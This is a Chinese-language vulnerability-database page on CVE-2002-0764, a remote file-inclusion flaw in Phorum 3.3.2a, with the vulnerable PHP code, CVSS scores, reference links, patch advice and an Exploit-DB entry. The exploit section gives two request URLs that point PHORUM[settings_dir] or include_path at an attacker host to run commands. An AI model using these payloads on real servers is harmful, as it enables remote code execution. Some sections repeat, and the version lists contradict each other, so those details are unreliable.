CVE-2002-0764
CVSS7.5
发布时间 :2002-08-12 00:00:00
修订时间 :2008-09-05 16:28:53
NMCOES    

[原文]Phorum 3.3.2a allows remote attackers to execute arbitrary commands via an HTTP request to (1) plugin.php, (2) admin.php, or (3) del.php that modifies the PHORUM[settings_dir] variable to point to a directory that contains a PHP file with the commands.


[CNNVD]Phorum远程命令执行漏洞(CNNVD-200208-146)

        
        Phorum是一款基于PHP的WEB论坛程序,可使用在Linux和Unix操作系统下,也可使用在Microsoft Windows操作系统下。
        Phorum在处理用户传递给URL参数的数据缺少正确充分的检查,可导致远程攻击者以Phorum进程的权限在目标系统中执行任意命令。
        Phorum中的'plugin.php','admin.php' 和 'del.php'脚本都存在漏洞,可导致远程攻击者以Phorum进程的权限在目标系统中执行任意命令。
        1)./plugin/replace/plugin.php中的问题代码如下:
                  include("$PHORUM[settings_dir]/replace.php");
         function mod_replace_read_body ($body) {
         global $pluginreplace;
         reset($pluginreplace);
         while(list($key,$val) = each($pluginreplace)) {
         $body = str_replace($key,$val,$body);
         }
         return $body;
         }
         $plugins["read_body"]["mod_replace"]="mod_replace_read_body";
         ?>
        其中PHORUM[settings_dir]变量对用户提交的数据缺少检查,可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        2)admin/actions/del.php中的问题代码如下:
                 require "$include_path/delete_message.php";
         delete_messages($id);
         QueMessage("Message(s) $id and all children were deleted!
        ");
        ?>
        其中del.php对include_path变量的数据缺少正确的检查, 可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        3)forum/plugin/replace/admin.php包含如下问题代码:
        include("$PHORUM[settings_dir]/replace.php");
        其中PHORUM[settings_dir]变量对用户提交的数据缺少检查,可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0764
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0764
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200208-146
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/4763
(VENDOR_ADVISORY)  BID  4763
http://www.iss.net/security_center/static/9107.php
(VENDOR_ADVISORY)  XF  phorum-php-command-execution(9107)
http://www.phorum.org/
(VENDOR_ADVISORY)  CONFIRM  http://www.phorum.org/
http://archives.neohapsis.com/archives/bugtraq/2002-05/0153.html
(VENDOR_ADVISORY)  BUGTRAQ  20020518 Phorum 3.3.2a has another bug for remote command execution
http://archives.neohapsis.com/archives/bugtraq/2002-05/0147.html
(UNKNOWN)  BUGTRAQ  20020517 Phorum 3.3.2a remote command execution

- 漏洞信息

Phorum远程命令执行漏洞
高危 输入验证
2002-08-12 00:00:00 2005-10-20 00:00:00
远程  
        
        Phorum是一款基于PHP的WEB论坛程序,可使用在Linux和Unix操作系统下,也可使用在Microsoft Windows操作系统下。
        Phorum在处理用户传递给URL参数的数据缺少正确充分的检查,可导致远程攻击者以Phorum进程的权限在目标系统中执行任意命令。
        Phorum中的'plugin.php','admin.php' 和 'del.php'脚本都存在漏洞,可导致远程攻击者以Phorum进程的权限在目标系统中执行任意命令。
        1)./plugin/replace/plugin.php中的问题代码如下:
                  include("$PHORUM[settings_dir]/replace.php");
         function mod_replace_read_body ($body) {
         global $pluginreplace;
         reset($pluginreplace);
         while(list($key,$val) = each($pluginreplace)) {
         $body = str_replace($key,$val,$body);
         }
         return $body;
         }
         $plugins["read_body"]["mod_replace"]="mod_replace_read_body";
         ?>
        其中PHORUM[settings_dir]变量对用户提交的数据缺少检查,可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        2)admin/actions/del.php中的问题代码如下:
                 require "$include_path/delete_message.php";
         delete_messages($id);
         QueMessage("Message(s) $id and all children were deleted!
        ");
        ?>
        其中del.php对include_path变量的数据缺少正确的检查, 可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        3)forum/plugin/replace/admin.php包含如下问题代码:
        include("$PHORUM[settings_dir]/replace.php");
        其中PHORUM[settings_dir]变量对用户提交的数据缺少检查,可导致远程攻击者包含位于自己控制机器上的任意文件来执行任意代码。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 严格过滤用户提交的变量$PHORUM[settings_dir]。
        * 在php.ini里设置allow_url_fopen = Off。
        厂商补丁:
        Phorum
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        Phorum Phorum 3.3.2 a:
        Phorum Upgrade phorum-3.3.2b3.tar.gz
        
        http://phorum.org/downloads/phorum-3.3.2b3.tar.gz

- 漏洞信息 (21459)

Phorum 3.3.2 a Remote Command Execution Vulnerability (EDBID:21459)
php webapps
2002-05-17 Verified
0 markus arndt
N/A [点击下载]
source: http://www.securityfocus.com/bid/4763/info

Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.

The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files. 

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&cmd=ls 		

- 漏洞信息

11141
Phorum plugin.php settings_dir Variable Arbitrary Command Execution
Remote / Network Access

- 漏洞描述

Unknown or Incomplete

- 时间线

2002-05-17 Unknow
2002-05-17 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete

- 漏洞信息

Phorum Remote Command Execution Vulnerability
Input Validation Error 4763
Yes No
2002-05-17 12:00:00 2009-07-11 12:46:00
Credited to Markus Arndt<markus-arndt@web.de>.

- 受影响的程序版本

Phorum Phorum 3.3.2 a
Phorum Phorum 3.3.2 b3

- 不受影响的程序版本

Phorum Phorum 3.3.2 b3

- 漏洞讨论

Phorum is a PHP based web forums package designed for most UNIX variants, Linux, and Microsoft Windows operating systems.

A vulnerability has been reported in Phorum that will allow remote attackers to specify external PHP scripts and potentially execute commands.

The vulnerability exists in 'plugin.php','admin.php' and 'del.php' files found in the distribution of Phorum. It is possible for a malicious attacker to specify the location of a parameter to the vulnerable PHP files by passing an argument via URL to the PHP files.

- 漏洞利用

The following examples were submitted:

http://[target]/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=http://[evilhost]&amp;cmd=ls

http://[vulnerablehost]/phorum/admin/actions/del.php?include_path=http://[evilhost]&amp;cmd=ls

- 解决方案

The vendor has released a new version to address this issue.


Phorum Phorum 3.3.2 a

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站